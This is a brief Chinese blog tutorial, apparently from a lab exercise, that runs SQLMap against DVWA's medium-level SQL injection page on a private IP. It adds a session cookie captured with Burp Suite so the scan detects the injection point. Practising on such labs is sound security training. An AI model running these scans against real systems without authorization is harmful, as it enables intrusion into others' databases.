您好,登錄后才能下訂單哦!
下面我們嘗試利用SQLMap進行medium級別下的注入。
首先探測是否存在注入點,執行下面的命令:
sqlmap.py -u http://192.168.80.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit
檢測結果沒有發現注入點,這是由于DVWA需要先登錄然后才能使用,因而這里需要得到當前會話的cookie,用來在***過程中維持連接狀態。利用Burpsuite攔截數據包,獲取cookie。
在SQLMap中加--cookie參數,繼續進行注入。
sqlmap.py -u "http://192.168.80.1/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=medium; PHPSESSID=2f120ee00f32798d11de936832312549"
這下成功探測到注入點。
關于sqlmap和Burpsuite以后會另行發個系列博文。
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。